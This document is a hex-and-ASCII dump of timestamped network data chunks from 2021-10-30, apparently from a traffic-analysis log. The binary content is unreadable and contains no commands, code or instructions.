                                                                                                                                                                                      2021-10-30 11:52:18 UTC571INData Raw: ec 00 85 1d 25 02 35 07 69 7c 26 0d 4e dd 0e d4 84 b4 8b b5 fa 96 cf a1 75 90 76 ab 00 c9 41 da fd cb 1b a0 d2 de d0 75 f0 46 05 6a 7c a1 80 40 ed 55 05 6a bd a3 c6 97 09 78 f4 e9 40 ed c9 fb 97 cf 3b 50 e3 9b 9f cf 2e ef f3 03 b3 2a 43 a0 c6 f5 76 af be 4c f0 c8 81 da a3 cb c7 1e bd b9 1e 7d c2 04 70 3c fa 64 57 2d 5f 6a b8 a7 4b 52 e5 d4 e2 7d 9e 8e 73 8b be 78 ee ab 5b 1e 57 fa cf 38 10 a8 79 8c 12 a8 e5 5b 9f 09 d4 d6 8e da 93 1f fa fe 0a fb 54 da 5e 85 53 97 bc 77 d4 0a 05 ea 8e 2b b4 ec 31 55 73 84 b6 39 58 53 61 67 89 dc bc 03 b5 04 61 3b 50 0b f6 8e 1a c1 5a 7f 0b 34 81 5a 36 12 bd 68 71 13 e6 25 19 e6 46 ec 7f 25 d1 fa b0 2d bd d8 5d 34 46 86 e8 03 4d d7 58 b9 6d 2b 38 6b 56 5a 30 c1 da e1 7f 81 4a 86 56 5b ee 30 43 58 88 ae bc 66 e9 94 3c b2 9c
                                                                                                                                                                                      Data Ascii: %5i|&NuvAuFj|@Ujx@;P.*CvL}p<dW-_jKR}sx[W8y[T^Sw+1Us9XSaga;PZ4Z6hq%F%-]4FMXm+8kVZ0JV[0CXf<
                                                                                                                                                                                      2021-10-30 11:52:18 UTC572INData Raw: 5f 26 e0 3f 13 bc 71 f9 38 8f 3e eb 87 6f d7 17 0a d8 55 f3 2e 9f 02 35 71 df e3 8f e7 a5 67 65 64 1f ab ff 04 65 fe 52 85 b0 83 34 ef a8 d5 67 d4 7a 47 2d 5f 26 f8 a1 1f ac 40 2d 13 82 e0 ac d1 2b 4c a5 a5 e6 aa 68 55 b8 99 2b 66 05 6b 46 31 58 4c 80 06 12 a4 65 d7 aa 39 41 1a b2 03 34 50 95 e6 b1 67 82 b4 3c 6e e4 b1 a7 1b a3 b7 4e 1d ac 51 71 20 24 99 1b b1 03 24 61 fe 5d 43 b6 22 19 3c b3 8a 72 c2 3b 70 12 a8 3b 6a 53 f5 43 f3 aa 26 12 13 ab d6 5e a1 3f 3c 49 fb 94 cf 6b b4 7c ac c7 9f 6e 4b b1 64 6e 4c 69 0f eb 66 b5 a7 65 e5 d8 48 5b c2 29 09 db 9b a9 11 b2 3c 0d 26 ea 2a 11 6a 65 d8 ce a6 60 ea 70 af d5 69 cb 3e 79 e8 a4 b7 7e a2 e5 2c 7d b4 4e 27 5a 9e f6 64 2c 14 61 2e 21 59 92 d7 41 08 01 99 30 41 d9 6d 50 81 5a 02 36 6c 61 06 d1 81 5a 06 36 37
                                                                                                                                                                                      Data Ascii: _&?q8>oU.5qgedeR4gzG-_&@-+LhU+fkF1XLe9A4Pg<nNQq $$a]C"<r;p;jSC&^?<Ik|nKdnLifeH[)<&*je`pi>y~,}N'Zd,a.!YA0AmPZ6laZ67
                                                                                                                                                                                      2021-10-30 11:52:18 UTC573INData Raw: 46 8d 2f 14 f0 19 b5 5b c7 1d 3e 1f 75 42 72 3e e8 83 7c ea 95 37 e3 3e 82 b4 62 7e 1a 24 3f 02 fc 52 ed d8 81 1a 8f 3f bd a3 f6 a5 1f fc 23 89 7d 14 84 f1 7b 1f 2d 3b 58 ab 5d 35 6c 46 71 cf 06 aa 8f 94 83 03 32 c6 1a b4 5c 28 76 90 26 fd a5 02 b0 7e f4 e9 20 4c 36 a3 98 60 2d 9c 00 8d 6f 7c 66 f7 2a 9f 4f e3 82 a4 21 34 96 00 8d c5 69 ef a4 05 d7 0e 9a d0 cf 8c 41 15 db c1 9a f2 aa b9 52 e5 4d 87 ea 84 e6 94 b9 d7 de 0e d4 1c 40 4e 59 79 69 db fa f6 a7 cf 88 fa 86 3f c9 7e 51 87 99 35 74 c8 4a 03 bb 7e 0f 69 63 31 24 6f 43 de b4 64 15 9a f2 80 2d 08 ee 9a d4 89 42 9b 34 59 6c d3 3b 17 44 e4 8d 27 c2 91 79 ca 77 39 45 25 9f a8 2d 1e 27 0d 80 c7 49 37 19 ef 76 11 8c 1d 76 d2 34 5a 15 ac e9 e4 39 3f e8 81 73 3d 6a 22 75 95 d3 15 ac 41 4b 0e ba be c5 f2 65
                                                                                                                                                                                      Data Ascii: F/[>uBr>|7>b~$?R?#}{-;X]5lFq2\(v&~ L6`-o|f*O!4iARM@NYyi?~Q5tJ~ic1$oCd-B4Yl;D'yw9E%-'I7vv4Z9?s=j"uAKe
                                                                                                                                                                                      2021-10-30 11:52:18 UTC575INData Raw: f8 cc 19 bb 65 6f 2b 20 23 48 fb c4 1b 6f 5e 3e 31 02 35 ec f9 99 0e b5 61 05 6a b4 54 a4 36 18 e9 29 5d 02 4b ee f3 e1 cf a3 69 bd e8 7f 19 05 fb b1 67 ed a6 25 50 7b 9e c7 9f 3c fa fc e9 1f f8 e3 af ee e9 cc 77 90 d6 81 5a 50 6d 76 80 16 db 5a 5c 0a 9b aa 2d 6a 84 86 d6 77 cf 60 f3 cb 97 15 ac f5 8e 5a 05 6a e7 9d 35 07 69 b0 9c 27 50 cb 4e 5a 2e fc ec a6 79 10 18 90 42 07 3f a0 06 d7 8b 34 d8 2c dd 01 1b 76 35 cb 01 13 ac e6 ba f9 aa 03 62 02 31 57 99 44 ec a0 25 48 ab 00 4d 7a 07 6b 33 50 9b 9f 53 eb 40 05 a0 5d 09 d0 60 ce b9 ea 56 ea d2 95 2f 88 2d ed 58 ed b1 b7 96 af 60 09 9e 06 79 17 96 62 83 a0 32 06 38 6f 56 2b 4b d7 a1 0e d5 c5 c0 3b 72 d0 d4 68 52 4a f9 70 5f 2d 83 dd f7 b2 83 9d 11 9a 2e 20 8a f0 52 c7 73 fe 60 02 31 a1 03 b2 63 90 46 5a 02
                                                                                                                                                                                      Data Ascii: eo+ #Ho^>15ajT6)]Kig%P{<wZPmvZ\-jw`Zj5i'PNZ.yB?4,v5b1WD%HMzk3PS@]`V/-X`yb28oV+K;rhRJp_-. Rs`1cFZ
                                                                                                                                                                                      2021-10-30 11:52:18 UTC576INData Raw: a0 56 c1 9a 77 d5 1e d9 9e 40 8d cf a9 dd fa 9f c5 e7 cb 04 9e 05 39 21 74 d4 40 3f 1b 33 fe fb 8b 03 fb 91 67 76 d3 14 a4 29 58 7b bf 1e 7d 12 ac 79 47 ed 27 7e e0 4f ac 40 ed f6 46 7f 15 0a 17 9f 02 b6 bd a8 a0 a7 11 6e d0 22 29 3e 0b 60 4d eb 15 ac e9 22 46 d6 48 f0 1b 6a de 59 2b 76 70 56 81 9a 75 95 3b 3e 5e 74 a5 72 a9 45 9e 9b 36 58 72 07 69 e6 96 85 e7 20 cd 69 92 75 fb 4f 1f 54 8f 49 c8 04 82 73 43 50 fd c2 c3 ae 1a b6 81 b4 8f 76 d1 46 a9 6e 97 fb 2e b4 6f bd 56 7d 46 b1 72 e4 86 11 99 7c c6 ab 8c d7 ad 73 30 46 74 df 2d 97 b1 11 c1 a2 0e 1b e5 ab f4 70 9d c3 be 20 ca 96 6c a9 f7 20 37 91 b1 ad 07 39 18 4f 2e ea 49 79 a0 d6 57 fb 6a 9c 18 20 4d 24 07 6b 15 a4 e9 04 ae 00 2d 18 79 21 f5 49 94 90 69 26 a9 dd 47 e6 55 72 27 98 94 b9 d0 52 b5 85 a3
                                                                                                                                                                                      Data Ascii: Vw@9!t@?3gv)X{}yG'~O@Fn")>`M"FHjY+vpVu;>^trE6Xri iuOTIsCPvFn.oV}Fr|s0Ft-p l 79O.IyWj M$k-y!Ii&GUr'R
                                                                                                                                                                                      2021-10-30 11:52:18 UTC577INData Raw: 05 6a 6a 93 ee 59 04 6a 94 cd 8c 08 69 44 d3 4d 5e c2 fc b1 c9 da 56 3b 6a e6 11 ac 09 09 d2 08 ce 08 d4 de 25 50 63 47 ed bf f8 81 ff 76 02 35 39 f2 63 4f 05 69 c1 70 82 34 61 c9 b4 63 06 6a c8 18 67 f3 d8 ad 8a ac a3 ef e8 ac 2a 1a f6 0a d6 5e bd dc 3b 6a 87 80 0d 5d 65 1a d7 05 98 4a 17 fb c6 94 95 cf 03 e3 9b bc 54 cb b6 45 0e b7 4c 6b 2a ff 6a 9b de aa 2b 03 08 ab 6e 9d 5f 07 63 8d b2 27 60 53 b0 a6 52 60 07 93 b4 6f 2d 50 ed 17 74 7d 62 ab d5 06 a5 06 69 8f 6b 5f 78 9d 55 f1 d0 39 dc 95 4b 88 69 cb 03 ed c7 d8 f5 e5 1c fa 82 20 cf c2 c8 10 72 46 fe 48 4e 2d e7 c9 99 5c c8 8c 61 f4 1c 0e a5 3b b3 4c b6 d6 c1 37 6d b1 51 8d eb dd d2 73 80 16 4e 9a 86 3d ba 08 d9 75 4f d6 a1 2f 8a 96 eb 2d 52 f9 08 22 8f 5e a1 5e 56 5a e6 48 75 25 93 b8 e4 ca 97 0c 88
                                                                                                                                                                                      Data Ascii: jjYjiDM^V;j%PcGv59cOip4acjg*^;j]eJTELk*j+n_c'`SR`o-Pt}bik_xU9Ki rFHN-\a;L7mQsN=uO/-R"^^VZHu%
                                                                                                                                                                                      2021-10-30 11:52:18 UTC579INData Raw: 40 2d fd 66 6c e9 26 fe 33 36 eb d1 e7 0a d6 b2 9b b6 be f1 39 02 35 be fd 79 fb c7 be eb 37 7e d6 8f 15 35 10 b9 16 41 09 7a e7 42 f3 34 30 f3 a1 7e 26 9d d9 b2 82 2b f1 d4 33 ac c9 cf f0 9a dd f8 ae 63 d8 2b 8f cb b8 4e 30 9c df bc e2 24 68 f0 39 11 f0 6d 9d 94 b2 25 2d 2c d5 ba de 76 65 5d 82 75 5e 8d aa 31 12 c3 17 0d 9d 01 dd 7f 65 0a 19 d8 25 97 5d 4e 5c 46 e8 9b 21 c8 cb 3a 2a 41 59 ea 7c 7d 80 16 3b f9 8d 8b d3 1a ec 6d cb c8 4f 7d a7 cf b2 e9 e3 e0 d6 17 ca 0f b2 98 72 fd 57 fe 41 6e d6 4a d0 b2 f3 0f d9 ba 0a 59 77 d9 6d 5f fa b0 c7 ff 15 c6 be fa 16 c4 16 5d ac c1 b7 fd 84 3e 1b c8 e6 9a 89 a7 8b da 3f 8b a0 89 1f 8c 9c d5 5d bc 74 d2 85 5c 31 95 b7 d3 83 2c 1e 54 e7 c3 42 16 e2 d5 46 18 03 68 bb d2 67 1e 95 b1 4c 59 90 ba 85 f8 3a 62 64 a3 eb
                                                                                                                                                                                      Data Ascii: @-fl&3695y7~5AzB40~&+3c+N0$h9m%-,ve]u^1e%]N\F!:*AY|};mO}rWAnJYwm_]>?]t\1,TBFhgLY:bd
                                                                                                                                                                                      2021-10-30 11:52:18 UTC580INData Raw: e6 85 86 37 17 72 2e e6 c6 dc 7a 87 3f 7f 78 82 3a da de f5 09 ab 6e b7 c1 bd a0 57 3b 58 f3 5f a0 c2 c5 5a dc 56 c0 26 5e 83 a3 b2 60 2f 64 07 56 ad 90 52 4a 12 31 23 01 b7 e3 84 12 22 8f 09 58 3a 2c d5 c5 f1 0d 79 c2 f0 12 ba a7 77 90 de 07 29 82 0c 52 de 68 f6 28 bc d6 ee 32 65 5f e5 5f c3 1c dc 62 4d 84 b6 ad f2 62 da c1 45 d1 72 b7 2d ac b3 52 b2 4f 05 78 e0 94 d3 7b db 4a ee 3a 7c a6 9d 8f fa 8b ed b7 b8 6d b0 07 14 8c dc 76 4e 42 d2 33 fa 59 10 07 73 92 96 5d e5 5c 1e 56 fe 96 59 b4 b4 c2 27 48 93 dd ab 7e 7c db 0e 5e e1 6d ef f6 0c 52 07 77 bf 23 97 79 51 44 15 16 a5 ad 41 eb ed 17 b4 ae 03 75 96 dc f9 57 5b c8 54 b2 69 e1 16 93 5e b2 13 4a 14 75 3d b6 15 db ff ca 57 68 1f c7 1b 44 db 4c 06 74 6b d5 c6 c8 d0 ee 7e f7 f7 48 ee 5f 44 93 83 8a a2 96
                                                                                                                                                                                      Data Ascii: 7r.z?x:nW;X_ZV&^`/dVRJ1#"X:,yw)Rh(2e__bMbEr-ROx{J:|mvNB3Ys]\VY'H~|^mRw#yQDAuW[Ti^Ju=WhDLtk~H_D
                                                                                                                                                                                      2021-10-30 11:52:18 UTC581INData Raw: f6 d6 e6 85 69 4f fa 97 b9 9b b4 08 f9 83 20 b8 76 cd 98 80 c2 04 67 f2 5a f6 04 6f 93 b3 ad 42 08 90 1a 94 c7 3b 67 e1 04 68 b0 d4 d5 70 15 a3 2d 42 c6 98 52 04 61 3c d2 f4 4e 9a e4 67 92 f3 0b 08 ec a4 25 48 5b 9f d5 16 d3 cf ac 89 e3 9e 2d f4 2e 98 38 41 16 78 b3 82 b5 07 aa 8f 7b 24 41 19 01 5a 3e e7 99 2f e9 a0 3b 4d f9 1a 2d 33 95 a5 fb ac 0b 13 a0 51 3b 58 81 5a 05 69 7c 3e ad 83 35 3f fe ac 5d 34 3f fa 24 58 f3 a3 cf ec 5a 51 1a 87 f4 c1 81 1a 3b 66 0a d4 d8 41 7b ab 76 d4 76 90 76 ff f2 e0 41 02 35 ef a6 09 bd 69 c4 75 ed 49 21 57 13 d5 4e 73 c9 09 d0 d8 3d 6b 4e b0 f6 5c e8 ff fb 29 e6 e7 3a 1c a8 89 6f 7f e0 57 fe 96 cf d2 b8 74 b3 58 ba 07 5f 35 70 22 08 d2 f8 b7 4e 1d b0 11 a0 3d d7 ca 43 90 c6 8f d6 ca 8d e4 fc 35 d6 bc 2e 1e 71 e3 9d 20 4e
                                                                                                                                                                                      Data Ascii: iO vgZoB;ghp-BRa<Ng%H[-.8Ax{$AZ>/;M-3Q;XZi|>5?]4?$XZQ;fA{vvvA5iuI!WNs=kN\):oWtX_5p"N=C5.q N
                                                                                                                                                                                      2021-10-30 11:52:18 UTC582INData Raw: 6a 2d df 0d d8 ca a7 b0 eb ec 80 4c 60 d3 9e 4f a4 55 fa e2 e8 16 4e 81 9a 3f be 01 b6 ac ab c2 c1 1a 98 2b 44 ed 16 7a d7 ac 31 a3 6b 54 e3 72 6b 45 17 5a 56 31 c6 4f b2 cf 89 b8 77 ca f8 6c ba 03 35 65 bc 16 ac a5 56 8f 54 9c 49 4f 90 96 40 c7 01 9a 74 07 69 e2 fd c3 b4 7c 1b 3b bb 63 0e ce d4 9e 0e d2 7a 37 8d 6f b5 62 63 aa d7 a5 21 7f 09 d2 e6 1f 44 7a 8b e8 63 c6 21 61 6f ed a6 89 f9 4c da f3 19 a4 ad c7 9e bd ab 96 3f cc 08 98 28 89 43 e2 0d be b8 e8 47 9f 0a c8 f8 f2 c0 9b 0f 1f 64 57 4d 41 9a 77 d4 74 9d 3d 64 47 4d bc 02 35 35 94 6b da c3 a1 cb 6d b3 ce 21 e3 5b 43 c5 1c 7f a1 7e b2 8b e6 b5 46 e7 30 ff 4b b5 bf 01 5a 81 9a da 46 3b 09 26 6f ff e0 77 ff d6 cf d2 3a ba 1a e6 42 cd 09 e3 24 74 80 d6 8f 38 7b 47 cd 72 31 f9 9a b7 8f 96 19 ca ed db
                                                                                                                                                                                      Data Ascii: j-L`OUN?+Dz1kTrkEZV1Owl5eVTIO@ti|;cz7obc!Dzc!aoL?(CGdWMAwt=dGM55km![C~F0KZF;&ow:B$t8{Gr1
                                                                                                                                                                                      2021-10-30 11:52:18 UTC584INData Raw: e6 1f 2f 96 4e 50 76 5f 13 c0 68 9b b8 f4 70 95 17 67 9d 91 e1 c4 9e 71 85 7e 49 5e 41 5a 21 e9 ce a3 49 b7 7d a8 22 eb ba 4b 76 90 66 d4 1d 18 79 dd 3d c5 5a 64 f8 b1 fa de 39 b3 5e 41 99 7f 72 49 1d 0c 33 d7 d4 77 33 72 98 79 95 18 a0 ef e7 b5 9b 26 ef 9b a3 3b 50 13 93 37 83 cd b8 e7 5c f8 91 a7 98 40 a7 83 b5 fc 00 75 e4 fe 9c 59 3f f6 d4 94 17 6b 1c 61 8d 45 30 f6 9d ce 54 c7 47 fb 89 ac b7 fb e4 bf 5b e8 b7 5b 02 66 67 2d c1 1a 41 58 d8 3b 57 1a 3f be 49 39 77 af f8 a3 cf d7 ba 1d 28 d8 94 63 76 d4 f8 56 a7 bf 4c a0 a0 8c dd b4 b7 1e 75 a0 76 df 81 9a 77 d5 14 b4 39 48 ab 40 2d d7 b7 dc 0c 76 07 d4 46 76 d4 08 d2 a8 87 dd b4 0e d0 56 90 56 c1 e3 fa d1 db e7 70 1e d1 de fe fe ef f9 1d 9f 9d 5d 0c fb d4 fb e2 25 30 43 3e 06 6a f5 6d 4f cb c9 df e5 ec
                                                                                                                                                                                      Data Ascii: /NPv_hpgq~I^AZ!I}"Kvfy=Zd9^ArI3w3ry&;P7\@uY?kaE0TG[[fg-AX;W?I9w(cvVLuvw9H@-vFvVVp]%0C>jmO
                                                                                                                                                                                      2021-10-30 11:52:18 UTC585INData Raw: 06 d3 43 a1 7b 6a 88 ce 0b d9 2f a3 b3 04 db 26 26 cf e4 5e 13 ef e9 46 ee a0 4c bc 03 b5 d4 e7 3a 41 55 48 60 e6 3e 10 a0 dd 82 6a bb 3a d4 53 25 32 81 8d fa ee 00 42 d8 03 c4 5c d0 9c e0 1e ec 2f 12 08 09 ce d6 4e 9a e5 fd f8 d3 f9 52 b3 fa c0 b8 73 2e ae 3f f6 64 ac 2d ab 9a 19 ac 65 ec 41 da ad b4 85 b2 e3 87 3c 23 ff 6b 03 35 d7 49 19 ba 92 16 31 2e 5a 09 34 7c 0e d5 1c ac bd 74 40 c6 6e 1a eb 08 3b f2 04 48 79 ec e8 75 83 d3 21 ca 5c 92 7f 0d 98 77 d4 74 8d f9 cb 04 1d a8 11 a4 89 bd a3 f6 50 c1 5c 05 6b d9 55 ab b1 ad 60 4d 43 91 f1 95 4c 90 96 1f 38 4e 90 e6 5d 34 b7 61 ef a2 79 07 ed 85 82 b3 67 09 d2 f8 8f 04 fe a7 ec c2 db df fb 3d bf 53 81 9a 06 1d 1e 27 80 93 e1 c0 ac e4 ec ae ed 93 d4 51 75 02 ad 9a 32 4a 0f e5 a2 31 ea 05 7a f8 56 de ca 6f
                                                                                                                                                                                      Data Ascii: C{j/&&^FL:AUH`>j:S%2B\/NRs.?d-eA<#k5I1.Z4|t@n;Hyu!\wtP\kU`MCL8N]4ayg=S'Qu2J1zVo
                                                                                                                                                                                      2021-10-30 11:52:18 UTC586INData Raw: 01 9b 83 24 21 bf c3 88 9c 40 0a 96 03 21 03 27 77 46 98 97 65 a5 f9 55 38 d3 38 ba ec 28 6f 9f 96 55 4f 31 c1 23 ed f7 cf 56 78 f7 2c c1 4c 9e 82 13 58 84 1f 38 30 53 1f 0f 98 40 cd ff 82 d1 ac c2 1a a4 1b 3e af e8 fb 7d b1 6a 52 48 90 00 6d 05 69 c8 f5 c8 53 d8 1b 37 69 a9 2a d7 78 9e 3f 9f 16 66 9c 83 3e 0f ca 4f b5 ae 5a 25 8d cd 78 1a 98 e0 2b f9 7b e7 cc 7d 55 db 3b 68 73 df 9c 27 e7 55 a0 1a 78 41 19 cb 15 9c d5 e3 4d 7f 4b bc 98 ff 5d ca e7 c2 76 a0 a6 73 21 27 3d d7 1c a8 b1 a3 26 7e 43 d7 1a 41 5a ef a8 f1 f8 f3 91 ae 39 d8 5f 26 60 47 4d e3 dc df fc ec 6b 9c 89 05 72 99 d1 b9 ec a6 51 5f 76 d4 fa 7f 7b f2 a8 f3 bd 0e d2 14 9c bd fb 34 c1 d9 e6 67 0a d4 be e7 5f aa 2f 13 14 ab ab cd 33 7a 86 99 32 13 19 1a ca 80 cd 7e c9 b6 35 04 8e b4 3c d6 9c
                                                                                                                                                                                      Data Ascii: $!@!'wFeU88(oUO1#Vx,LX80S@>}jRHmiS7i*x?f>OZ%x+{}U;hs'UxAMK]vs!'=&~CAZ9_&`GMkrQ_v{4g_/3z2~5<
                                                                                                                                                                                      2021-10-30 11:52:18 UTC588INData Raw: 69 26 ad 0f f1 eb 04 f2 38 d2 27 92 f3 82 3c 91 59 20 f4 ac b0 bd 74 ca 9e b8 83 be b5 83 47 7d f2 80 ac b3 18 d6 d8 f6 ef 8e f5 a3 bf c5 6a 38 c1 84 7f 74 55 f2 7d 07 0d b7 1a 3f b1 06 f7 9e f0 1e 68 d6 1c 10 ae 1f 48 56 79 7f 2e 6d f2 4d 7e f8 d8 01 99 ea 35 23 ab 37 b9 af 73 27 db f7 eb cc 89 3d 07 fc 32 62 ea f4 50 f2 87 6a 94 f6 3c 32 ab 4d a0 da 91 c7 b2 6a ab b8 db 4f 7f 36 df 37 f2 39 32 98 47 94 96 95 bf 1f 91 b6 0c 26 d8 23 b0 0b d3 42 0d e7 6e a7 18 39 b4 a5 49 b4 f7 48 75 6e dd b3 4e ad 5e 62 9f 05 92 cd e6 e3 da 40 e0 b6 83 46 90 00 0e ce 6e 5b 64 f8 9e 07 5f 0d ed 93 70 9d 93 9e a9 9b 93 74 e4 b2 cb cf b4 51 76 db c8 13 66 30 b0 4d 0c b5 cc 09 8f b8 2d c5 1c 4a ce a1 48 72 a7 4f e6 e0 17 ba b1 e4 13 e6 c6 cc 3c 61 e1 60 2e 6f 74 c0 e6 0b 9d
                                                                                                                                                                                      Data Ascii: i&8'<Y tG}j8tU}?hHVy.mM~5#7s'=2bPj<2MjO6792G&#Bn9IHunN^b@Fn[d_ptQvf0M-JHrO<a`.ot
                                                                                                                                                                                      2021-10-30 11:52:18 UTC589INData Raw: 37 1e 02 34 71 fe 4d 58 02 b4 7e 62 96 e0 4c ac 16 5d 67 02 b6 0a de 74 8d 26 68 0b 77 ef 18 15 de cc 83 ee ed 4e 0b 73 1d 36 d6 e8 c9 57 73 07 86 b2 ab 4d 0e 0a 85 8e 37 58 b8 84 dd 07 75 ca d8 81 9b 83 b7 c1 0e c8 ee dd cf d8 48 ee 1d b5 89 0e d6 8c 9a 57 f2 bd d6 78 b5 05 6a dc 44 cb 01 e1 10 bb 73 3e df e9 98 78 cb 9a 0a 75 0d b7 2c 73 5d ef bd 16 4c b9 ff 30 dd cc 1a b7 f5 7b 0e c2 d4 bc 0f e3 3a 1b e6 74 2b 38 2d 4c 6e b9 d3 50 87 9d e6 81 68 dc cc 42 97 41 4a b9 2e d3 72 db 41 b3 fd a5 25 ea b6 8f b1 15 d9 c4 c8 59 bb 43 33 ef f6 17 b9 6f 3e 8d f9 6c c3 07 b0 ae 32 b0 83 36 f2 cf 35 f2 c0 ae 91 46 15 d7 59 3e dc c4 7d 42 b1 69 c1 16 26 38 e3 d9 fa d6 9b bd c0 23 b3 b8 97 9e c0 aa f4 21 af 89 a2 2a 25 da a6 ec 42 26 07 79 22 db 3e e4 46 6e 18 c8 f3
                                                                                                                                                                                      Data Ascii: 74qMX~bL]gt&hwNs6WsM7XuHWxjDs>xu,s]L0{:t+8-LnPhBAJ.rA%YC3o>l265FY>}Bi&8#!*%B&y">Fn
                                                                                                                                                                                      2021-10-30 11:52:18 UTC590INData Raw: 4d ed ef 60 ed 10 b4 2d 54 b0 26 dc 3b 6c 1d b4 cd 80 ed c8 fb 31 68 82 34 e2 93 7e e5 ac a9 0f 74 a2 e6 3e d7 4c e3 62 75 a4 03 2f cb cf 74 ed aa 63 8d 2f 1b c5 2f 26 3e d3 18 c0 04 6f 2a 97 60 0d 99 60 4d 63 2a 36 6a 4c fb df 6d 82 de 51 6b 62 f0 9b 6b 9a 1d b8 3b c2 4b 73 b8 98 c9 a7 79 d2 ac d2 1a be d2 25 9b b1 b7 2d cc 5f 12 53 df b6 2a 23 3f 6b c7 40 f6 6e 15 ad 0c 15 7a 44 2d ec 24 d3 50 10 ad 46 90 cb f2 d5 3d 93 cd 75 88 75 a0 be 04 6b 62 75 f2 10 88 a9 a1 07 9c 4c fe 2a 33 51 6f f1 6c bf b8 da b3 6f 2c 3a 89 57 78 05 67 57 79 3f 22 85 99 40 67 bd 19 5f 53 ee 3c 5e a3 8d d2 75 45 59 5e c8 04 8a bd b9 83 34 39 29 64 f1 0f de e1 3b c1 5a a1 3b df e3 c0 b8 78 30 4c 53 6e ca b8 15 b6 b2 7c 9c ec 60 73 d1 56 cb 58 e7 24 38 59 26 9d 47 64 c1 3e 8f ad
                                                                                                                                                                                      Data Ascii: M`-T&;l1h4~t>Lbu/tc//&>o*``Mc*6jLmQkbk;Ksy%-_S*#?k@nzD-$PF=uukbuL*3Qolo,:WxgWy?"@g_S<^uEY^49)d;Z;x0LSn|`sVX$8Y&Gd>
                                                                                                                                                                                      2021-10-30 11:52:18 UTC592INData Raw: ec e5 53 31 b8 82 34 21 81 9a f8 95 83 34 d6 0e 21 7d 72 bf d4 17 02 cd df f3 ab 7f d7 67 25 a9 55 77 b9 ba 30 a4 68 9a 43 e6 0e b6 1c 94 c9 6d 07 5c 7c 63 e5 c1 d2 c9 33 83 31 ca 35 46 6e 5f 9a 76 9a 98 6d 17 4f 99 81 15 7a e2 ab 1d 9c 0e b0 49 e6 0f 27 06 3f 87 03 51 34 c5 67 3f 39 48 c7 71 a3 4d 91 7d 92 9d 74 46 71 72 8e e3 a8 95 13 d1 22 2f 29 3d c9 97 bc 6c 8d 51 ac fb 78 cd de 54 fe 55 71 23 c4 a2 67 f4 51 d4 0d 33 8d 85 f8 50 71 d9 7d 55 1e ed 07 e6 92 29 44 cf b7 5b 49 ab fc 5d ab 21 f6 e4 df 34 47 85 31 6c 6a d9 e3 8f 2c 8c 2c e4 65 3d 79 22 c4 8f b3 0e 5e e4 72 80 8e ce 1f 1f 18 e3 ab 65 27 19 2d f7 84 1b b6 ce 43 5a df 6c 6c ab 3e 84 63 37 81 66 94 46 51 97 ab 7c ed e7 88 43 5e 01 57 cb f1 65 9b cb 87 db 16 a3 78 50 6a d2 0c 2a bb bc d8 c6 9c
                                                                                                                                                                                      Data Ascii: S14!4!}rg%Uw0hCm\|c315Fn_vmOzI'?Q4g?9HqM}tFqr"/)=lQxTUq#gQ3Pq}U)D[I]!4G1lj,,e=y"^re'-CZll>c7fFQ|C^WexPj*
                                                                                                                                                                                      2021-10-30 11:52:18 UTC593INData Raw: 34 9e b1 e9 b5 81 85 ca 01 99 ba d7 81 58 cb 67 4e e0 56 01 9a fc cc 20 cd 41 d9 90 db 7f f3 aa d3 f5 77 8b c2 50 23 64 99 43 46 fc 2e d5 c9 bc 43 cb 59 84 55 4f e9 90 6d e8 4e 6b d9 29 f5 72 52 f2 61 46 2f 5c a4 fa 6d ab 66 a4 39 35 b5 4a ce 1b 65 f3 d6 81 68 b6 97 b3 4a 31 5a ab 8a 6d 97 3c 6d d1 92 33 0b 67 21 6d b3 8a 2c d4 04 d9 7a d9 08 c4 ea 6a ed 00 0d f4 6f 05 91 66 5f 42 6c e5 73 b1 a8 eb 33 a0 db be d9 f5 0d 72 93 75 00 23 d7 58 33 d0 95 90 31 b7 68 dc 94 36 d8 5e d8 94 32 dd 88 d6 5b c6 ff d9 a6 bc e0 da c9 42 2e 5c 4c da 91 5d c6 75 4c 5b d9 0b dd f7 91 6f a6 ad 3c c2 59 c7 4e 1b 76 b5 2d 4e 62 33 39 11 8c da a4 9c 9b 75 08 6a 51 29 5d b7 4a 9f e6 5e ec b6 9c d3 ef 20 a9 74 16 f1 c9 2c 2a f0 7a cc 37 ec 4b 96 7f e7 93 03 90 05 29 dc 01 1a b1
                                                                                                                                                                                      Data Ascii: 4XgNV AwP#dCF.CYUOmNk)rRaF/\mf95JehJ1Zm<m3g!m,zjof_Bls3ru#X31h6^2[B.\L]uL[o<YNv-Nb39ujQ)]J^ t,*z7K)
                                                                                                                                                                                      2021-10-30 11:52:18 UTC594INData Raw: 2c c4 9e f6 80 16 22 57 7a 63 49 11 8d bb 5e 07 31 7a 3b ad 27 c5 9d b6 60 a8 34 73 e9 ca 68 99 02 4e a8 9b 7a e7 6d 07 db 51 c9 29 bf 6e ec 9d 1f 5b a7 59 1f 34 db 26 79 b5 81 bc d6 7b 09 29 b9 da d6 41 43 b7 cb 58 f5 a6 7c 68 d5 55 f9 56 5e a8 70 ea c8 f1 05 6b 7c 35 81 8e b6 05 c5 b4 27 18 2a 5d 07 90 63 97 5f 81 df e2 6e f7 b4 89 1d 80 21 cb 67 07 63 42 ff 81 71 08 ce 9a f1 51 72 aa 14 45 37 55 7a db 6d 2d 39 d4 33 76 eb 5d c6 3e 3a af f5 92 21 c9 d1 65 11 62 dd bc cf 24 8b 48 a3 19 59 96 d6 75 6b f7 e2 96 e0 0c 66 c1 29 44 67 01 12 7a f1 91 bd 17 14 16 a1 d8 a2 f7 62 ef bc 95 a7 65 ef 90 61 53 f9 be 49 f4 ae 99 77 d4 f0 4b 5a d9 12 a4 a5 7c 6e f2 ea 43 21 54 b0 84 3f f8 df fc 0d 97 4f 7f e3 c7 a3 7c 0d f4 37 7e e4 ef 5e fe ca 9f fd 2f 34 9e cc 97 7d
                                                                                                                                                                                      Data Ascii: ,"WzcI^1z;'`4shNzmQ)n[Y4&y{)ACX|hUV^pk|5'*]c_n!gcBqQrE7Uzm-93v]>:!eb$HYukf)DgzbeaSIwKZ|nC!T?O|7~^/4}
